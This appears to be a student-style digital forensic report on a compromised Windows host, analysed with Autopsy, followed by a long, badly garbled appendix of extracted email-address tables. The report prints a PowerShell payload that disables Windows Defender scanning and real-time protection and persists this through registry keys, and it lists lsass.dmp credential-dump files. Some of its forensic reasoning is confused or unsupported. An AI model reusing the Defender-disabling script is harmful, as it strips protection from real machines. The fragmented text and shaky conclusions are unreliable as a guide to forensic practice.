Intelligence Report Final
Intelligence Report Final
Intelligence Report Final
This report is based on PDF (portable document format) in order to view this report you must have
a pdf viewer install in your system if it is not present, you may be installed it by clicking on this
link
https://en.softonic.com/download/pdf-reader/windows/post-download?ex=BB-1549.1
Font used Content: Times new Roman size: 12
Font used heading: Times new Roman size: 16
Executive Summary
Forensic analysis of digital evidence is never performed in a vacuum – its necessity arises out of a
course of events whether in a criminal investigation, civil litigation or a policy violation in the
corporate environment. In this case my boss has acknowledged that I have been consistently
exceeding my junior analyst expectations, and as a result she has agreed to promote me into a
senior role. As a senior analyst, I will now be expected to lead a digital forensic investigation,
requiring little to no guidance in doing so.
After my promotion a new case has just arrived that requires my immediate attention. My
company has been contracted to conduct a digital forensic investigation into the compromise of
an existing customer’s host. The customer believes they have been re-compromised by the same
actor as previously investigated, so be on the lookout for overlapping TTPs.
Page 1/145
Case Details
Case Identifier
Customer
Customer Contact
Date Completed
Background
Once the case has been reported and the forensic examiner determines and classifies the cybercrime
case. The examiner will get to the scene of crime take control and secure the crime scene from
contamination by not allowing any person to interact with the digital equipment or device.
According to ACPO guidelines the forensic examiner should photograph the digital devices in the
crime scene or site and keep a record of the device status including the on-screen
details/information. The device should then be powered off if it’s on to isolate it from the network
and prevent any usage of the device that can temper with the data in the device. The forensic
examiner should seize chargers, cables manuals, phone bills and packaging if possible, the
packaging material may have some information for the forensic examiner. The digital devices must
be packaged well and carried in specialized carriers and only handled by authorized personnel.
As per usual, the customer’s Security Operations Centre (SOC) has performed an initial
investigation, and successfully located the compromised host. The host was contained and
reimaged, but not before the disk and memory were captured. Furthermore, the customer has also
provided me with a relevant network capture from a location somewhere within their network.
Page 2/145
Technical Analysis
As a forensic investigator I will be carrying out investigation on two image files, one named
disk.raw and the next being memory. Raw. The investigation environment is a Linux system that is
safe from viruses or worms. Its distribution name is Debian 10 and Autopsy will be the most used
tool for this investigation. Autopsy is one of the sleuth kit tools that runs locally on the browser and
fired from the terminal. This is a graphical user interface tool that is easy to navigate around and
collect forensic evidence.
This test is necessary so that to be sure the image file is as original as the original drive. I will do
this by comparing its hash value. Lets have a look at the MD5 hash comparison that will be done
by Autopsy tool. It is stated pass to show that the hash value are the same for the disk.raw image
file. The image file will now give correct evidence after investigation. This is shown in the figure
bellow.
I will also check the MD5 hash of the other image file named memory.raw. This image file also
pass the integrity check meaning the hash value has not changed.
Page 3/145
Fig 1.1. Shows the original vs current MD5 hash value comparison.
Another important factor is to check the image information. This is done by navigating to the image
details tab on the top bar of autopsy. We can view the file system information, the metadata
information, and the content information. The file system is of type NTFS, volume name WinRE
and version being Windows XP. The image information is shown at the bellow figure 1.2.
Page 4/145
The system hard drive was compromised in that it could not boot anymore. Some of the files were
also deleted. The deleted files are named unallocated file while those present are stated located The
attacker launched a virus that ended up compromising the hard drive. The system can not find the
drive during its booting process. We can see from the bellow figure how the system respond when
boot attempt is done.
The boot manager is said to be compressed and that's why we receive an error stating a disk read
error occurred.
So many file were deleted and this can be seen by clicking the all deleted file button that is on the
left side of the screen. This deleted files include images, documents of different formats, and other
executable files. The fig 1.3 bellow shows some on the deleted files.
Page 5/145
Fig 1.3. Shows some of the deleted files
From the list we can we a suspicious file having a .dll extension. Such a file is executable and any
malicious application may have been created that when executed by the user it corrupts the entire
system. I followed a path that leads to some deleted image file with png extension. From the bellow
figure we can see some of this images.
Page 6/145
Now I find some NTUSER.DAT file after analysiz this file it was confirmed that suspects using
these files for attacking vector Fig 1.5 to 1.7 show the mirror of the statement
Fig 1.5. Initial attack vector that was used to compromise the user
.
Name /img_disk.raw/vol_vol7/Users/Alan/ntuser.dat.LOG1
Type File System
MIME Type application/x.windows-registry
Size 425984
File Name Allocation Allocated
Metadata Allocation Allocated
Modified 2019-07-10 22:39:20 CDT
Accessed 2019-07-10 22:39:20 CDT
Created 2019-07-10 22:39:20 CDT
Changed 2019-07-10 22:39:20 CDT
MD5 c0e6b78b920e32d8b481f5cc01c7b6d7
Hash Lookup Results UNKNOWN
Internal ID 42864
Page 7/145
Fig 1.6
Fig 1.7
Name /
img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.MicrosoftEdge_8we
kyb3d8bbwe/AC/#!001/MicrosoftEdge/Cache/Y2A6TZJV/190806113425-03-russia-
explosion-0805-large-tease[1].jpg
Type File System
MIM
E image/jpeg
Type
Size 31989
File
Name
Allocated
Alloc
ation
Meta Allocated
data
Page 8/145
Alloc
ation
Modif
2019-08-17 01:40:06 CDT
ied
Acces
2019-08-17 01:40:06 CDT
sed
Creat
2019-08-17 01:40:06 CDT
ed
Chan
2019-08-17 01:40:06 CDT
ged
MD5 c3cfb8dc8cad94a62ed67d9ae273d726
Hash
Look
up UNKNOWN
Resul
ts
Intern
38657
al ID
after examines these document it was found that that payload will exist in the backend of this
document and this will auto disabled windows all security features
Page 9/145
Fig 1.8 document that was used to compromise the user
Here I show you some metadata at the backend of the document which
containing the payload
Page 10/145
Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $True
Set-MpPreference -DisableScanningNetworkFiles $True
Set-MpPreference -DisableBlockAtFirstSeen $True
# Persist Windows Defender features settings in registry
$path = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
if (!(Test-Path -Path $path)) {
New-Item -Path $path -Force
New-ItemProperty -Path $path -Name "DisableAntiSpyware" -PropertyType DWord -Value 1
-Force
$path = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"
if (!(Test-Path -Path $path)) {
New-Item -Path $path -Force
New-ItemProperty -Path $path -Name "SubmitSamplesConsent" -PropertyType DWord -Value 2
-Force
$path = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
if (!(Test-Path -Path $path)) {
New-Item -Path $path -Force
New-ItemProperty -Path $path -Name "DisableRealtimeMonitoring" -PropertyType DWord -Value
1 -Force
New-ItemProperty -Path $path -Name "DisableBehaviorMonitoring" -PropertyType DWord -Value
1 -Force
New-ItemProperty -Path $path -Name "DisableOnAccessProtection" -PropertyType DWord -Value
1 -Force
New-ItemProperty -Path $path -Name "DisableScanOnRealtimeEnable" -PropertyType DWord
-Value 1 -Force
I found some mentioned below links through which machine will be compromised as this link will
contain malware because it was showing very high latency
Page 11/145
Fig 1.10 Link that was used to compromise the user
Appendix
AppendixA
EXIF Metadata
Device La Lo Al T
Date Manuf Device tit ngi tit a
Source File
Taken acture Model ud tud ud g
r e e e s
2004- /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
04-09 NT/MSScan/WelcomeScan.jpg
09:17:00
CDT
2004- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
04-09 fax-
09:17:00 common_31bf3856ad364e35_10.0.17763.1_none_fcca98cea8c9f397/
CDT WelcomeScan.jpg
2015- Cano Cano /
09-22 n n img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
12:50:15 EOS- MicrosoftEdge_8wekyb3d8bbwe/AC/#!
CDT 1D X 001/MicrosoftEdge/Cache/Y2A6TZJV/190705115727-leonardo-
dicaprio-divestinvest-super-169[1].jpg
2017- /img_disk.raw/vol_vol7/Program
09-27 Files/WindowsApps/microsoft.windowscommunicationsapps_17.9330.
Page 12/145
Device La Lo Al T
Date Manuf Device tit ngi tit a
Source File
Taken acture Model ud tud ud g
r e e e s
17:05:12 21365.0_x64__8wekyb3d8bbwe/images/bg1a_thumb.png
CDT
2017- Cano Cano /
11-15 n n img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
21:54:57 EOS- MicrosoftEdge_8wekyb3d8bbwe/AC/#!
CST 1D X 001/MicrosoftEdge/Cache/KBBFFLP4/190815164849-alex-rotter-
tease-medium-tease[1].jpg
2018- Apple iPhon /
08-20 e7 img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
13:09:09 Plus MicrosoftEdge_8wekyb3d8bbwe/AC/#!
CDT 001/MicrosoftEdge/Cache/YATO9SWU/190419152043-01-greenland-
climate-change-small-169[1].jpg
2019- Cano Cano /
08-05 n n img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
20:08:25 EOS- MicrosoftEdge_8wekyb3d8bbwe/AC/#!
CDT 1D X 001/MicrosoftEdge/Cache/Y2A6TZJV/190806113425-03-russia-
explosion-0805-large-tease[1].jpg
AppendixB
Email Addresses
%[email protected]
T
a
Preview Source File
g
s
Page 13/145
%[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
-putty-user-key-file-ssh-sshconnection@putty.projects.tartarus.org
Ta
Preview Source File
gs
rojects.tartarus.org«-putty-user-key-file-ssh- /
[email protected]«-2.0----- begin ssh2 img_disk.raw/vol_vol7/Window
s/Temp/plink.exe
Page 14/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 15/145
[email protected]
T
a
Preview Source File
g
s
b-8d? 0- /img_disk.raw/vol_vol7/Windows/Speech_OneCore/Engines/TTS/en-
lb;*e+czh+t>«[email protected] US/M1033Zira.TBT.NUS
«- :&i,eak*]s"hrma*`u
b-8d? 0- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
lb;*e+czh+t>«[email protected] t..peech-en-us-
«- :&i,eak*]s"hrma*`u onecore_31bf3856ad364e35_10.0.17763.1_none_ecc2dbcee106498b/M103
3Zira.TBT.NUS
[email protected]
T
a
Preview Source File
g
s
0 0g0m0~0[0 0 id o0 /img_disk.raw/vol_vol7/Program
«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64
ft.com« ~0_0o0 __8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
user@contoso Shared/OFFICE16/MSOIDRES.DLL
[email protected]
T
a
Preview Source File
g
s
Page 16/145
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 17/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 18/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 19/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
lient::hrinitclient /img_disk.raw/vol_vol7/Windows/SysWOW64/msdrm.dll
«__nosuchmailid__@dontexis
t.foo« microsoft::informat
lient::hrinitclient /img_disk.raw/vol_vol7/Windows/System32/msdrm.dll
«__nosuchmailid__@dontexis
t.foo« microsoft::informat
Page 20/145
T
a
Preview Source File
g
s
lient::hrinitclient /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«__nosuchmailid__@dontexis r..ement-client-v1-
t.foo« microsoft::informat api_31bf3856ad364e35_10.0.17763.1_none_d8c386bdeb6dfde2/ms
drm.dll
lient::hrinitclient /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
«__nosuchmailid__@dontexis r..ement-client-v1-
t.foo« microsoft::informat api_31bf3856ad364e35_10.0.17763.1_none_e31831101fcebfdd/msd
rm.dll
[email protected]
T
a
Preview Source File
g
s
pcimpl::hrgeticrypt /
«[email protected] img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDriv
oo« windows: virmdocume e/18.143.0717.0002/ipcfile.dll
/signature> </xrml> /
«[email protected] img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDriv
oo« license-acquisition e/18.143.0717.0002/ipcsecproc.dll
/signature> </xrml> /
«[email protected] img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDriv
oo« delegatedtenantid e e/18.143.0717.0002/msipc.dll
pcimpl::hrgeticrypt /
«[email protected] img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDriv
oo« windows: virmdocume e/18.143.0717.0002_1/ipcfile.dll
/signature> </xrml> /
«[email protected] img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDriv
oo« license-acquisition e/18.143.0717.0002_1/ipcsecproc.dll
Page 21/145
T
a
Preview Source File
g
s
/signature> </xrml> /
«[email protected] img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDriv
oo« delegatedtenantid e e/18.143.0717.0002_1/msipc.dll
mipccrypt::hrencode /img_disk.raw/vol_vol7/Windows/System32/winipcfile.dll
«[email protected]
oo« virmdocumentipcimpl
mipccrypt::hrencode /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-
«[email protected] windows-r..ment-client-v2-
oo« virmdocumentipcimpl core_31bf3856ad364e35_10.0.17763.1_none_46def9d0c62d6f82/w
inipcfile.dll
Page 22/145
[email protected]
T
a
Preview Source File
g
s
dfromregistrystring /img_disk.raw/vol_vol7/Program
«_c14e99c7-44bb-44ef-9f1d- Files/WindowsApps/Microsoft.Office.OneNote_16001.10228.20003.
[email protected]« 0_x64__8wekyb3d8bbwe/mso30imm.dll
wzname is null, can
[email protected]
T
a
Preview Source File
g
s
[email protected]' is nu /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
'là«[email protected]«'. t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e
druk op # 7da144/Alphabet.xml
Page 23/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
Tag
Preview Source File
s
Page 24/145
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 25/145
T
a
Preview Source File
g
s
32.dll
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
«[email protected]«0 cghd Defender/Scans/mpcache-
lm`@ ictc odz 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
«[email protected]«0 cghd
lm`@ ictc odz
/raizaccv1_der.crl0 /
«[email protected]«0 cghd img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.d
lm`@ ictc odz mp
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
«[email protected]«0 cghd
lm`@ ictc odz
Page 26/145
T
a
Preview Source File
g
s
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
«[email protected]«0 cghd
lm`@ ictc odz
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]«0 cghd crypt32-
lm`@ ictc odz dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt32
.dll
/raizaccv1_der.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
«[email protected]«0 cghd crypt32-
lm`@ ictc odz dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt32
.dll
[email protected]
T
a
Preview Source File
g
s
ion electronica1%0# /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsa
070216153551z 2702 ss.dmp
Page 27/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
ria de economia1$0" /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsa
050508000000z 2505 ss.dmp
Page 28/145
T
a
Preview Source File
g
s
ypt32.dll
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 29/145
[email protected]
Ta
Preview Source File
gs
.onaudience.com1#0! /
«[email protected]«0 kj}z qkmk ;h c (0& img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdu
mp/lsass.dmp
.onaudience.com1#0! /
«[email protected]«0 kj}z qkmk ;h c (0& img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdu
mp/lsass.zip/lsass.dmp
[email protected]
T
a
Preview Source File
g
s
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
«[email protected]«0 Defender/Scans/mpcache-
[email protected] 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
«[email protected]«0
[email protected]
.mtin.es/mtin/ocsp0 /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.
[email protected] dmp
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
«[email protected]«0
[email protected]
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
«[email protected]«0
[email protected]
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]«0 crypt32-
[email protected] dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt
32.dll
Page 30/145
T
a
Preview Source File
g
s
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
«[email protected]«0 crypt32-
[email protected] dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt
32.dll
[email protected]
T
a
Preview Source File
g
s
Page 31/145
T
a
Preview Source File
g
s
s192-ctr,aes256-ctr,«aes128- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
[email protected]«,aes256-
gcm@openssh.
s192-ctr,aes256-ctr,«aes128- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
[email protected]«,aes256- components-
gcm@openssh. onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e35
c/ssh.exe
Page 32/145
T
a
Preview Source File
g
s
78/ssh-agent.exe
[email protected]
T
a
Preview Source File
g
s
Page 33/145
T
a
Preview Source File
g
s
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-add.exe
«[email protected]«
chacha20-poly1305@o
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-
«[email protected]« agent.exe
chacha20-poly1305@o
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-
«[email protected]« keygen.exe
chacha20-poly1305@o
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-
«[email protected]« keyscan.exe
chacha20-poly1305@o
128- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
[email protected],«aes256-
[email protected]« umac-64-
etm@openssh
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
«[email protected]« components-
chacha20-poly1305@o onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e3
5c/ssh-keyscan.exe
128- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
[email protected],«aes256- components-
[email protected]« umac-64- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e3
etm@openssh 5c/ssh.exe
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-
«[email protected]« common-components-
chacha20-poly1305@o onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e8c
478/ssh-add.exe
Page 34/145
T
a
Preview Source File
g
s
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-
«[email protected]« common-components-
chacha20-poly1305@o onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e8c
478/ssh-agent.exe
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-
«[email protected]« common-components-
chacha20-poly1305@o onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e8c
478/ssh-keygen.exe
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 35/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
atarios de la lista /
«[email protected]« img_disk.raw/vol_vol7/Windows/System32/DriverStore/FileRepository/
01/01/20007assunto prnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL
atarios de la lista /
«[email protected]« img_disk.raw/vol_vol7/Windows/System32/spool/drivers/x64/3/FXSRE
01/01/20007assunto S.DLL
atarios de la lista /
«[email protected]« img_disk.raw/vol_vol7/Windows/WinSxS/amd64_dual_prnms002.inf_3
01/01/20007assunto 1bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FX
SRES.DLL
[email protected]
Ta
Preview Source File
gs
Page 36/145
[email protected]
T
a
Preview Source File
g
s
rutyun amirjanyan, /
(«[email protected]«) img_disk.raw/vol_vol7/Windows/SystemApps/Microsoft.MicrosoftEdgeD
based on code init evToolsClient_8wekyb3d8bbwe/23/common/monaco-
editor/min/vs/language/html/htmlWorker.js
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 37/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 38/145
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
x86, cryptogams by /
<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDriv
usvw \$ 1 \$ 1 _^[ e/18.143.0717.0002/libeay32.dll
x86, cryptogams by /
<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDriv
usvw \$ 1 \$ 1 _^[ e/18.143.0717.0002_1/libeay32.dll
Page 39/145
T
a
Preview Source File
g
s
_64, cryptogams by /
<«[email protected]«>fffffff img_disk.raw/vol_vol7/Windows/System32/Macromed/Flash/Flash.o
fffffff vws cx
appversion@contextrequestdiagnosticsenabled8diagnosticscapabilityenabledlc
ontextresponselandingpagerelativepath.land
T
a
Preview Source File
g
s
xtrequestappversion /img_disk.raw/vol_vol7/Program
«appversion@contextrequestdiagnosticsenabled8diagno Files/WindowsApps/Microsoft.GetHelp_10.
sticscapabilityenabledlcontextresponselandingpagerelativ 1706.10441.0_x64__8wekyb3d8bbwe/Get
epath.land«ingpagerelativepath: Help.dll
[email protected]
T
a
Preview Source File
g
s
Page 40/145
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 41/145
T
a
Preview Source File
g
s
ssh_session2_setup
[email protected]
T
a
Preview Source File
g
s
Page 42/145
[email protected]
T
a
Preview Source File
g
s
n.min.js', /
'https://«b199c4f03a024452b8de58 img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Mic
[email protected]«/206795', rosoft.MicrosoftEdge_8wekyb3d8bbwe/AC/#!
{"environm 001/MicrosoftEdge/Cache/KBBFFLP4/index[1].htm
b__331_0pcheckmodedeactivatedonbackbuttonproperty4ischeckmodeenabledp
roperty.itemcheckedpathproperty@checkboxesindicatorstyleproperty.show
T
a
Preview Source File
g
s
gindicatorcontainer>«b__331_0pcheckmodedeactivatedon /img_disk.raw/vol_vol7/Program
backbuttonproperty4ischeckmodeenabledproperty.itemche Files/WindowsApps/Microsoft.WindowsFe
[email protected] edbackHub_1.1805.2331.0_x64__8weky
w«checkboxesthreshold6 b3d8bbwe/PilotshubApp.dll
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
ebb85995028c_owner: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« hvsi-
Page 43/145
T
a
Preview Source File
g
s
custom:msip_label_f office_31bf3856ad364e35_10.0.17763.1_none_5c949f977156f0f5/WD
AGPlaceholder.docx
ebb85995028c_owner: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« hvsi-
custom:msip_label_f office_31bf3856ad364e35_10.0.17763.1_none_5c949f977156f0f5/WD
AGPlaceholder.pptx
ebb85995028c_owner: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« hvsi-
custom:msip_label_f office_31bf3856ad364e35_10.0.17763.1_none_5c949f977156f0f5/WD
AGPlaceholder.xlsx
ebb85995028c_owner: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« hvsi-
custom:msip_label_f office_31bf3856ad364e35_10.0.17763.592_none_e05e35e69f02aa2a/
WDAGPlaceholder.docx
ebb85995028c_owner: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« hvsi-
custom:msip_label_f office_31bf3856ad364e35_10.0.17763.592_none_e05e35e69f02aa2a/
WDAGPlaceholder.pptx
ebb85995028c_owner: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« hvsi-
custom:msip_label_f office_31bf3856ad364e35_10.0.17763.592_none_e05e35e69f02aa2a/
WDAGPlaceholder.xlsx
[email protected]
T
a
Preview Source File
g
s
Page 44/145
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
instrumentation1'0% /
«[email protected]«0 |e}vn4 img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Micro
Page 45/145
Ta
Preview Source File
gs
instrumentation1'0% /
«[email protected]«0 |e}vn4 img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Micro
9un"u$ l0j0 soft/Windows/UsrClass.dat.LOG1
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 46/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
Page 47/145
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 48/145
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 49/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 50/145
T
a
Preview Source File
g
s
html.dll
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 51/145
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 52/145
[email protected]
T
a
Preview Source File
g
s
Page 53/145
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 54/145
T
a
Preview Source File
g
s
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-
«chacha20- add.exe
[email protected]« failed
to retrieve
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-
«chacha20- agent.exe
[email protected]«
md5sha1 sha256 sha3
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-
«chacha20- keygen.exe
[email protected]« failed
to retrieve
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-
«chacha20- keyscan.exe
[email protected]«
md5sha1 sha256 sha3
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
«chacha20- components-
[email protected]« onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
md5sha1 sha256 sha3 e35c/ssh-keyscan.exe
Page 55/145
T
a
Preview Source File
g
s
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-
«chacha20- common-components-
[email protected]« failed onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e8
to retrieve c478/ssh-add.exe
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-
«chacha20- common-components-
[email protected]« onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e8
md5sha1 sha256 sha3 c478/ssh-agent.exe
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-
«chacha20- common-components-
[email protected]« failed onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e8
to retrieve c478/ssh-keygen.exe
[email protected]
T
a
Preview Source File
g
s
hambersignroot.crl0 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
«chambersignroot@chambersign. Defender/Scans/mpcache-
org«0* chambersignroot@c 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
hambersignroot.crl0 /
«chambersignroot@chambersign. img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dm
org«0* chambersignroot@c p
hambersignroot.crl0 /
«chambersignroot@chambersign. img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/l
org«0* chambersignroot@c sass.dmp
hambersignroot.crl0 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
«chambersignroot@chambersign.
org«0* chambersignroot@c
Page 56/145
T
a
Preview Source File
g
s
hambersignroot.crl0 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
«chambersignroot@chambersign.
org«0* chambersignroot@c
hambersignroot.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-
«chambersignroot@chambersign. windows-crypt32-
org«0* chambersignroot@c dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/
crypt32.dll
